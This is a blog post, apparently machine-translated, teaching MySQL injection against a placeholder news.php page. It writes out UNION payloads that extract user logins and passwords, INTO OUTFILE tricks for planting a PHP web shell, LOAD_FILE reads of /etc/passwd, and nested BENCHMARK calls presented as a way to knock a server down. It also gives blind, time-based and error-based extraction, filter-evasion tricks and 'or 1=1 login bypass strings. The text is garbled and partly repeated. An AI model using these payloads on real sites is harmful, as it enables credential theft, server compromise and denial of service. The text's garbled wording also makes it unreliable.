Assalam-0-Alaikum,
if you want to learn from the beginning you must watch my complete series from the beginning,
i am completing my Series on My SQL injection:
- Lesson 1 And 2 Intro and type of Vulnerabilities
- Lesson 3 Learning about My SQL
- Lesson 4 Expert Learning About MySQL
************************************786**************************************
Description of columns / tables if you can not access INFORMATION_SCHEMA
This zhopny option. Here comes into force on a regular brutofors ... Example:
_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3,4,5,6 FROM tbl_name --
Should choose tbl_name until not lost error message like:
mysql_query (): Table 'tbl_name' doesn't exist
Well, we have introduced to her happiness Users missing error message, and the page displays as if
_http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2,3,4,5,6 -
It means something that There's a table Users, and to proceed to the sorting columns.
_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3, column_name, 5,6 FROM Users --
Should choose col_name until not lost error message like:
mysql_query (): Unknown column 'col_name''in' field list '
Where is lost error message means such column exists.
And so we learned that the Users table has columns login, password.
Listing Information....Appeal to the script so _http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2, login, password, 5,6 FROM Users LIMIT 1,1 - Displays us login and password the first nick in the table Users.
There is a MYSQL such an interesting feature like SELECT ... INTO OUTFILE allows you to record information in the file. Alternatively, such a construction SELECT ... INTO DUMPFILE they almost seem, and you can use any.
example:
_http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1. Txt'; --
prevented us to make the web going? That's like this:
_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3,' ', 5,6 INTO OUTFILE '1. php '--
It remains only to find the full path to the root of the site on a server and add it to 1.php. Vriprintsipe found another mistake on the report which will be visible path on the server or leave the root server and pick up its local inkludom, but that is another topic.
Reading files
Consider the function LOAD_FILE
_http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2, LOAD_FILE (' etc / passwd '), 4,5,6;
For here, there are also several limitations.
Must be a full path to the file.
Wanted privileges such as FILE
File should be located on the same server
The size of the file must be less than specified in the max_allowed_packet
The file should be opened for reading from the Members area under which is running MYSQL
and If the function fails to read the file it returns NULL.
**************
In most cases, SQL Server dosyat due to the fact that nothing else they can do. Type failed to learn tables / columns, no rights to it, no rights to it, etc. I honestly against this method but still ...
Get to the point ... www.H4ck3rCracks.com
BENCHMARK function performs the same action several times.
SELECT BENCHMARK (100000, md5 (current_time));
So here this function 100000 times makes md5 (current_time) that I have on comp takes about 0.7 seconds ... It seems that there is such ... And if you try the attached BENCHMARK?
SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (current_time)));
Example Dos in our case:
_http: / / xxx / news.php? id =- 1 'UNION SELECT 1, 2, BENCHMARK (100000, BENCHMARK (100000, md5 (current_time))), 4, 5, 6 --
Suffice it 100 times poked F5 and the server goes down in unrestrained Down
**********
Character bust
This case we need if _http: / / xxx / news.php? Id = 1, with different id will give us different results http://xxx/news.php?id=1 will be different from _http: / / xxx / news.php? Id = 0
if not, then this method is useless but to finish worth.
request to the database
SELECT * FROM news WHERE id = '1 '
Now we will modify a vulnerable paramtr id to such request
SELECT * FROM news WHERE id = '-1' OR id = IF (ASCII ((SELECT USER ()))>= 254, '1 ', '0') - ';
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII ((SELECT USER ()))>= 254, '1', '0 ') --
To start MYSQL runs the subquery SELECT USER () inserts it into the function ASCII () which returns the ascii code for the first character of the result of the virtual command and the function IF () returns 1 if the code is greater than or equal to 100
general request to become such
SELECT * FROM news WHERE id = '-1' OR id = 1
when accessing the script _http: / / xxx / news.php? id = 1 and if the code of this number is less then the main query is this
SELECT * FROM news WHERE id = '-1' OR id = 0
and performed just as well as in _http: / / xxx / news.php? id = 0 will be called conditionally that the query returns 1 (yes) or 0 (no), respectively, and begin to pick.
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 100, '1', '0 ')
Again returned 1 means the first character is greater than or equal to 100. We try like this:
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 200, '1', '0 ')
Returned 0 means 100 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 150, '1', '0 ')
Again he returned 0 means 100 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 125, '1', '0 ')
And once again returned 0 means 100 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 113, '1', '0 ')
Returned 1 sledovatelno113 <= character code <125 data-blogger-escaped-.="." data-blogger-escaped-br="br">_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 118, '1', '0 ')
Returned 0 sledovatelno113 <= character code <118 data-blogger-escaped-.="." data-blogger-escaped-br="br">_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 115, '1', '0 ')
113 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 113, '1', '0 ')
Returned 0 means the character code is not equal to 113.
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 114, '1', '0 ')
Cheers! Returned 1 means the character code is 114. We translate into a symbol and get the symbol "r". Now on to the next character.
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 2,1)> = 100, '1', '0 ')
What to do if there is no output of the field and off error reporting? We will come to the aid of the function BENCHMARK. As described above, this function performs a single action several times. So what you ask ... And that's what. Recall that the query
SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (NOW ())));
^ _^
character at a time to pick any option is valid user name under which we are connected to the database (it takes us to the function USER ()).
we will to pick the string USER (). Only in this case, instead of 0, the function will be a very long time to fulfill this request and that we will talk about that a request has returned, and 0, respectively, if without any delay, then the query returns 1.
Now let's talk about the time delay. To determine the recovery time of 0 and 1 need to make several preliminary queries:
Will return 0. It is necessary to detect the time. Depending on the width of your channel to select the number 2999999 to the extent that you can accurately judge whether or not the delay in comparison with
.................return 1
after each execution BENCHMARK-SQL server and need to give some time to rest.
error reporting
This method is based on the fact that instead of returning 0, executed subquery which causes an error and the error output can be judged that the returned 0 and the absence of errors that returns 1. This method will help us if there is no output of the field but including (!) Bug report.
Correct the error as the id is compared with a subquery that returns two rows.
mysql_query (): Subquery returns more than 1 row
This was the theory. Now turn to the query with which we are to pick characters
As seen from this query if the character code is greater than or equal to 100 function IF () returns 1, then the errors and no frequent visitors, and if the function performs a subquery
which returns two strings that when compared with the id causes an error and we understand that the query returns 0.
A great disadvantage of this method is that the logs will accumulate huge amounts of errors. A great advantage is speed.
many had the impression that this is a hopeless case...not with xXJoKeRXx. Well, what are we going to change this view to the contrary. Suppose a database query looks like this:
And as always variable $ by not pass filtering, and the page displays a few lines from the database. What we need to get two requests that would change somehow finding the page, but requests must be such as to be able to influence the outcome of using subqueries say. As such inquiries may be
Well Well request for Brutus this nick name will look like this:
Well hatched reverse order News => false
Again lie
About! Direct order News => true
We translate the character code 114 in the symbol r. Proceed to the next character and so on.
character at a time to pick any option is valid user name under which we are connected to the database (it takes us to the function USER ()).
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1 )))>= 100, 1, BENCHMARK (2999999, MD5 (NOW ()))) --
Inquiry will be
SELECT * FROM news WHERE id = '-1' OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1 )))>= 100, 1, BENCHMARK (2999999, MD5 (NOW ())) ) - ';
we will to pick the string USER (). Only in this case, instead of 0, the function will be a very long time to fulfill this request and that we will talk about that a request has returned, and 0, respectively, if without any delay, then the query returns 1.
Now let's talk about the time delay. To determine the recovery time of 0 and 1 need to make several preliminary queries:
_http: / / xxx / news.php? id =- 1 'OR id = IF (99> 100, 1, BENCHMARK (2999999, MD5 (NOW ())))
Will return 0. It is necessary to detect the time. Depending on the width of your channel to select the number 2999999 to the extent that you can accurately judge whether or not the delay in comparison with
_http: / / xxx / news.php? id =- 1 'OR id = IF (101> 100, 1, BENCHMARK (2999999, MD5 (NOW ())))
.................return 1
after each execution BENCHMARK-SQL server and need to give some time to rest.
error reporting
This method is based on the fact that instead of returning 0, executed subquery which causes an error and the error output can be judged that the returned 0 and the absence of errors that returns 1. This method will help us if there is no output of the field but including (!) Bug report.
SELECT * FROM news WHERE id = '-1' OR id = (SELECT 1 UNION SELECT 2)
Correct the error as the id is compared with a subquery that returns two rows.
mysql_query (): Subquery returns more than 1 row
This was the theory. Now turn to the query with which we are to pick characters
SELECT * FROM news WHERE id = '-1' OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1 )))>= 100, 1, (SELECT 1 UNION SELECT 2)) - ' ;
As seen from this query if the character code is greater than or equal to 100 function IF () returns 1, then the errors and no frequent visitors, and if the function performs a subquery
SELECT 1 UNION SELECT 2
which returns two strings that when compared with the id causes an error and we understand that the query returns 0.
A great disadvantage of this method is that the logs will accumulate huge amounts of errors. A great advantage is speed.
many had the impression that this is a hopeless case...not with xXJoKeRXx. Well, what are we going to change this view to the contrary. Suppose a database query looks like this:
SELECT * FROM news ORDER BY $ by
And as always variable $ by not pass filtering, and the page displays a few lines from the database. What we need to get two requests that would change somehow finding the page, but requests must be such as to be able to influence the outcome of using subqueries say. As such inquiries may be
_http: / / xxx / news.php? by id * 1)
_http: / / xxx / news.php? by id *- 1)
Well Well request for Brutus this nick name will look like this:
_http: / / xxx / news.php? by id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 11 2,1, -1))
Well hatched reverse order News => false
_http: / / xxx / news.php? by id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 11 3,1, -1))
Again lie
_http: / / xxx / news.php? by id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 11 4,1, -1))
About! Direct order News => true
We translate the character code 114 in the symbol r. Proceed to the next character and so on.
So Now ,
CHTO TO DO IF SOMETHING FILTERS
let us recall that the SQL type of design / ** / is equal to the gap
There is an interesting function CHAR () which returns the code symbol itself simvol.Predpolozhim filtered character ... Well, let him be an asterisk (*). First, we need to know the code for this symbol. In MYSQL is a function ASCII () returns the leftmost character of the string passed to it so yuzaem
SELECT ASCII ('*');
only on a vulnerable host, do not make sense (The symbol '*' filtered) it must be done on the LAN. We learn that the code is 42 and yuzaem function CHAR () so
SELECT CHAR (42, 42, 42);
Outputs three zvezdochki.Esche one way is to use a 16-hexadecimal character code. Now suppose that the filtered light bay 'login'. In MYSQL is a function of HEX () which issues a 16-hexadecimal code line. Yuzaetsya so
SELECT HEX ( 'login');
Will produce '6 C6F67696E 'ahead appends "0x" (To SQL realized he was dealing with a 16-hexadecimal encoding) and obtain '0 x6C6F67696E' is juzat without CHAR () so
SELECT 0x6C6F67696E FROM User;
either the CHAR () so
SELECT CHAR (0x6C, 0x6F, 0x67, 0x69, 0x6E) FROM User;
*******************************************************************************
Now i will explain the new way of sql attacks we will depend on fatal errors or mistakes on web applications .... yeah suck developers who did not understand fully about sql injection
LOOK....!!!!!!!!
sql injection errors is very important... getting to the site will send you a ridiculous SQL query error message and he will give us a form.... we reviewed this error message and will try to find some clues from within.... for example, a site the user to input a user name and password section to
section 'or 1 = 1 - let me say enter...... if the sql vulnerability on the site should give an error as follows:
<!--[ If! SupportLineBreakNewLine] ->
<!--[ Endif] ->
Microsoft OLE DB Provider for ODBC Drivers error '80040e07 ' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'users' to a column of data type int......... / Index.asp, line 11 that's how we got an error..... if this error;
Microsoft Database Drivers error '80040e07 '
sql Server 'users' table did not enter a valid value for matching,...... syntax error has occurred.
/ Index.asp, line 11
Does not end in SQL queries.
'Or 1 = 1 -
"Or 1 = 1 -
'Or' a '=' a
or 1 = 1 -
') Or (' a '=' a
"Or" a "=" as a parameter can also be used.
Above the user name and password section 'or 1 = 1 - to write
because
entry requirement is nothing you or 1 = 1 state get. (1 is always 1 to be equal because every time this command works)
POLEZNYE FUNCTIONS IN MYSQL
directory language SQL
USER ()-function displays login nick under which we are connected to MYSQL
DATABASE ()-function displays the name of the database to which we are connected
VERSION ()-displays the version of MYSQL
----------------------------
ASCII (str)-returns ASCII code of first character in the string "str"
CHAR (xx1, xx2 ,...)- returns a string consisting of ASCII codes which somvolov xx1, xx2, etc
HEX (str)-returns the hexadecimal equivalent of 16-string "str".
----------------------------
LENGTH (str) - Returns the length of the string "str".
SUBSTRING (str, pos [, len])-Returns a substring of length len (if not specified before the end of string "str") characters from string "str", starting from the position pos.
LOCATE (substr, str [, pos])-Returns the position of first occurrence of "substr" to the string "str" starting at position pos (unless it is specified with the beginning of the line "str"). If the substring "substr" in line "str" is missing, it returns 0.
----------------------------
LOWER (str)-translates into lower case string "str" (I think only the Latin)
CONCAT (param1, param2 ,...)-association substrings in one line.
CONCAT_WS (sep, param1, param2 ,...)-association substrings in one string delimiter c "sep".
----------------------------
IF (exp, ret1, ret2)-Check the condition exp if it is true (not 0) then returns a string ret1 but if not then returns a string ret2.
----------------------------
expr BETWEEN min AND max-If the value of expr is greater than or equal to a specified value of min and less than or equal to a specified value max, then the function BETWEEN returns 1, otherwise - 0.
----------------------------
AES_DECRYPT (AES_ENCRYPT ( 'string', 'bla'), 'bla') are often Newer bugs summary encoded and can be so strong do not bother using this design.
**************************************************************
Comments in Mysql
# start a comment character in MySQL. Example
SELECT pass, login FROM users # This is comment
SELECT pass, login FROM users
- another version of the commentary in MySQL. Required space after the sign. Example
SELECT pass, login FROM users - This is comment
/ * * / comments similar SI in MySQL. The closing part is optional. For MySQL indeintichna gap. Example
SELECT pass, login FROM users / * This is comment
SELECT pass, login / * This is comment * / FROM users
SELECT / ** / pass, login / ** / FROM / ** / users
/ *! Int * / Expansion of the previous comments. All prisoners in this comment will be interpreted as an SQL query if the number of the MySQL version is equal to the specified number of int after an exclamation point or more. Example
SELECT pass / *! 32302, login * / FROM users
*************************
SQL-Injection: (Fixed in vB 3.0.9)
> / Joinrequests.php:
POST:
> / AdminCP / User.php:
GET:
GET:
> / AdminCP / usertitle.php:
GET:
> / AdminCP / usertools.php:
GET:
o XSS: (Fixed in vB 3.0.9)
=================================================================
> / AdminCP / css.php:
GET:
> / AdminCP / index.php:
GET:
> / AdminCP / User.php:
GET:
> / AdminCP / language.php:
GET:
> / AdminCP / modlog.php:
GET:
> / AdminCP / template.php:
GET:
GET:
GET:
o Arbitrary File Upload:
=================================================================User with an administrator panel to access (eg (Co) Administrator) and
privilege to add the avatars / icons / smileys is able to upload arbitrary
files. An attacker is able to gain the ability to execute commands under
the context of the web server.
> / AdminCP / image.php:
POST:
POST:
POST:
****************************
Random Registration Getting a table
declare @ sql varchar (500) / * this variable to hold our SQL statement * /
declare @ rowCnt int / * how many records are in the table to keep * /
declare @ top int / * city that will be record holder * /
@ rowCnt = select count (*) from the district / * how many records as we find our table * /
select @ top = cast (rand () * @ rowCnt as int) / * we produced random number * /
/ * Create random log will bring our sql statement * /
set @ sql = 'select top 1 from the district .* tt tt
where not in tt.icKod
(Select top '+ cast (@ top as varchar) +' from ickod district)
exec (@ sql) / * work to order created the same kind sql le yearning and longing, we start to wait for results * /
I have a table
I also use this table structure
CREATE TABLE [dbo]. [District] ( [IcKod] [smallint] NOT NULL, [IcDesc] [varchar] (16) OLLATE NULL Turkish_CI_AS ) ON [PRIMARY]
INSERT INTO district
(IcKod, icDesc)
VALUES
(4, 'BAKIRKÖY');
INSERT INTO district
(IcKod, icDesc)
VALUES
(3, 'BAHÇELİEVLER');
INSERT INTO district
(IcKod, icDesc)
VALUES
(2, 'Bagcilar');
INSERT INTO district
(IcKod, icDesc)
VALUES
(1, 'AVCILAR');
INSERT INTO district
(IcKod, icDesc)
VALUES
(5, 'Bayrampasa');
Usefull Commands In Sql Injection
Take commands is useful for injection
Abort - abort the current transaction
ALTER DATABASE - change a database
ALTER GROUP - add users to a group or remove users from a group
ALTER TABLE - change the definition of a table
ALTER TRIGGER - change the definition of a trigger
ALTER USER - change a database user account
ANALYZE - collect statistics about a database
BEGIN - start a transaction block
CHECKPOINT - force a transaction log checkpoint
CLOSE - close a cursor
CLUSTER - cluster a table according to an index
COMMENT - define or change the comment of an object
COMMIT - commit the current transaction
COPY - copy data files and tables Between
CREATE AGGREGATE - define a new aggregate function
CREATE CAST - define a user-defined cast
CREATE CONSTRAINT TRIGGER - define a new constraint trigger
CREATE CONVERSION - define a user-defined conversion
CREATE DATABASE - create a new database
CREATE DOMAIN - define a new domain
CREATE FUNCTION - define a new function
CREATE GROUP - define a new user group
CREATE INDEX - define a new index
CREATE LANGUAGE - define a new language PROCEDURAL
CREATE OPERATOR - define a new operator
CREATE OPERATOR CLASS - define a new operator class for Indexes
CREATE RULE - define a new rewrite rule
CREATE SCHEMA - define a new schema
CREATE SEQUENCE - define a new sequence generator
CREATE TABLE - define a new table
CREATE TABLE AS - create a new table from the results of a query
CREATE TRIGGER - define a new trigger
CREATE TYPE - define a new data type
CREATE USER - define a new database user account
CREATE VIEW - define a new view
DEALLOCATE - remove a Prepared Query
DECLARE - define a cursor
DELETE - delete rows of a table
DROP AGGREGATE - remove a user-defined aggregate function
DROP CAST - remove a user-defined cast
DROP CONVERSION - remove a user-defined conversion
DROP DATABASE - remove a database
DROP DOMAIN - remove a user-defined domains
DROP FUNCTION - remove a user-defined function
DROP GROUP - remove a user group
DROP INDEX - remove an index
DROP LANGUAGE - remove a user-defined language PROCEDURAL
DROP OPERATOR - remove a user-defined operator
DROP OPERATOR CLASS - remove a user-defined operator class
DROP RULE - remove a rewrite rule
DROP SCHEMA - remove a schema
DROP SEQUENCE - remove a sequence
DROP TABLE - remove a table
DROP TRIGGER - remove a trigger
DROP TYPE - remove a user-defined data type
DROP USER - remove a database user account
DROP VIEW - remove a view
END - commit the current transaction
EXECUTE - execute a query Prepared
EXPLAIN - show the execution plan of a statement
FETCH - retrieve rows from a table Using a cursor
GRANT - define access privileges
INSERT - create new rows in a table
LISTEN - to the list for a notification
LOAD - load or reload a shared library file
LOCK - explicitly lock a table
MOVE - position a cursor on a row of a table Specified
NOTIFY - generate a notification
PREPARE - create a Prepared Query
Reindex - rebuild corrupted Indexes
RESET - restore the value of a run-time parameter to a default value
REVOKE - remove access privileges
ROLLBACK - abort the current transaction
SELECT - retrieve rows from a table or view
SELECT INTO - create a new table from the results of a query
SET - change a run-time parameter
SET Constraints - set the constraint mode of the current transaction
Authorization SESSION SET - set the session user identifier and the current user identifier of the
current session
SET TRANSACTION - set the Characteristics of the current transaction
SHOW - show the value of a run-time parameter
START TRANSACTION - start a transaction block
Truncate - empty a table
UNLISTEN - stop listening for a notification
UPDATE - update rows of a table
VACUUM - garbage-collect and optionally analyze a database
END For MySQL
:P NOw give your feedback i want to see what will be the comments .
Regards,
Zulqurnain jutt
I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on
i don't understand nothing but u can explain better with video and applicaded in one site i think like this better and thank's
ReplyDelete